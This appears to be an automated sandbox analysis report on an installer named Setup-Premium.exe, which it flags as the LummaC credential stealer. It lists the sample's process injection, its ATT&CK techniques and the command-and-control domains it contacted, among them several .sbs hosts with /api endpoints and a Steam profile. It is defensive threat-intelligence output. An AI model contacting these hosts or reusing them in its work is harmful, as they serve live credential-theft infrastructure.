                  Source: C:\Users\user\Desktop\Setup-Premium.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Users\user\Desktop\Setup-Premium.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Windows VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Windows\AppReadiness VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Setup-Premium.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Setup-Premium.exe.2800000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Setup-Premium.exe.2800000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Setup-Premium.exe.2800000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Setup-Premium.exe.2800000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2299589275.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2173525211.0000000002800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2173525211.00000000029BF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		2
                  Virtualization/Sandbox Evasion                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote Services1
                  Screen Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		Boot or Logon Initialization Scripts1
                  DLL Side-Loading                  		311
                  Process Injection                  		LSASS Memory2
                  Virtualization/Sandbox Evasion                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Native API                  		Logon Script (Windows)Logon Script (Windows)11
                  Deobfuscate/Decode Files or Information                  		Security Account Manager1
                  Account Discovery                  		SMB/Windows Admin Shares2
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell                  		Login HookLogin Hook3
                  Obfuscated Files or Information                  		NTDS22
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  DLL Side-Loading                  		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  No Antivirus matches

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                  https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
                  http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://store.steampowered.com/points/shop/0%URL Reputationsafe
                  https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                  https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                  https://store.steampowered.com/about/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
                  https://help.steampowered.com/en/0%URL Reputationsafe
                  https://store.steampowered.com/news/0%URL Reputationsafe
                  http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
                  https://store.steampowered.com/stats/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
                  https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
                  http://json-schema.org/draft-04/schema#0%URL Reputationsafe
                  https://store.steampowered.com/legal/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
                  https://store.steampowered.com/0%URL Reputationsafe
                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  condifendteu.sbs
                  		104.21.79.35
                  		truetrue
                    		unknown
                    steamcommunity.com
                    		104.102.49.254
                    		truetrue
                      		unknown
                      vennurviot.sbs
                      		172.67.140.193
                      		truetrue
                        		unknown
                        drawwyobstacw.sbs
                        		188.114.96.3
                        		truetrue
                          		unknown
                          mathcucom.sbs
                          		188.114.96.3
                          		truetrue
                            		unknown
                            proclaimykn.buzz
                            		188.114.96.3
                            		truetrue
                              		unknown
                              sergei-esenin.com
                              		104.21.53.8
                              		truetrue
                                		unknown
                                ehticsprocw.sbs
                                		172.67.173.224
                                		truetrue
                                  		unknown
                                  resinedyw.sbs
                                  		172.67.205.156
                                  		truetrue
                                    		unknown
                                    enlargkiw.sbs
                                    		172.67.152.13
                                    		truetrue
                                      		unknown
                                      allocatinow.sbs
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        enlargkiw.sbstrue
                                          		unknown
                                          allocatinow.sbstrue
                                            		unknown
                                            drawwyobstacw.sbstrue
                                              		unknown
                                              mathcucom.sbstrue
                                                		unknown
                                                https://steamcommunity.com/profiles/76561199724331900true
                                                • URL Reputation: malware
                                                		unknown
                                                https://vennurviot.sbs/apitrue
                                                  		unknown
                                                  ehticsprocw.sbstrue
                                                    		unknown
                                                    condifendteu.sbstrue
                                                      		unknown
                                                      https://drawwyobstacw.sbs/apitrue
                                                        		unknown
                                                        https://resinedyw.sbs/apitrue
                                                          		unknown
                                                          https://mathcucom.sbs/apitrue
                                                            		unknown
                                                            resinedyw.sbstrue
                                                              		unknown
                                                              vennurviot.sbstrue
                                                                		unknown

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://www.cloudflare.com/learning/access-management/phishing-attack/BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://steamcommunity.com/?subsection=broadcastsBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://sergei-esenin.com/BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://github.com/zitadel/zitadel/blob/new-eventstore/cmd/zitadel/startup.yaml.Setup-Premium.exefalse
                                                                          		unknown
                                                                          http://www.valvesoftware.com/legal.htmBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://json-schema.org/draft-04/schema#/properties/maximumSetup-Premium.exefalse
                                                                            		unknown
                                                                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://json-schema.org/draft-04/schema#/properties/titleSetup-Premium.exefalse
                                                                              		unknown
                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://swagger.io/v2/schema.json#Setup-Premium.exefalse
                                                                                		unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://drawwyobstacw.sbs/htBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002EF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://steamcommunity.com/mBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://json-schema.org/draft-04/schema#/properties/defaultSetup-Premium.exefalse
                                                                                        		unknown
                                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        http://json-schema.org/draft-04/schema#/definitions/positiveIntegerSetup-Premium.exefalse
                                                                                          		unknown
                                                                                          http://json-schema.org/draft-04/schema#/properties/uniqueItemsSetup-Premium.exefalse
                                                                                            		unknown
                                                                                            http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://gorm.io/docs/hooks.htmlWarning:Setup-Premium.exefalse
                                                                                              		unknown
                                                                                              http://json-schema.org/draft-04/schema#/properties/patternSetup-Premium.exefalse
                                                                                                		unknown
                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                • URL Reputation: malware
                                                                                                		unknown
                                                                                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://www.cloudflare.com/learning/access-managBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F96000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aBitLockerToGo.exe, 00000002.00000003.2288941580.0000000002F91000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://mathcucom.sbs/BitLockerToGo.exe, 00000002.00000003.2183297651.0000000002F3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2193093217.0000000002F3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://avatars.akamai.steamstaticBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://ehticsprocw.sbs/BitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://store.steampowered.com/about/BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://html4/loose.dtdSetup-Premium.exefalse
                                                                                                                		unknown
                                                                                                                https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://index.docker.io/v1/inputSetup-Premium.exefalse
                                                                                                                  		unknown
                                                                                                                  https://help.steampowered.com/en/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://steamcommunity.com/market/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://store.steampowered.com/news/BitLockerToGo.exe, 00000002.00000003.2288880798.0000000002FBC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2282297159.0000000002FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    http://json-schema.org/draft-04/schema#/properties/exclusiveMaximumSetup-Premium.exefalse
                                                                                                                      		unknown
                                                                                                                      https://ehticsprocw.sbs/MBitLockerToGo.exe, 00000002.00000003.2250209476.0000000002F2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://json-schema.org/draft-04/schema#/properties/descriptionSetup-Premium.exefalse
                                                                                                                          		unknown
                                                                                                                          https://sergei-esenin.com/apiMBitLockerToGo.exe, 00000002.00000002.2300154573.0000000002F28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
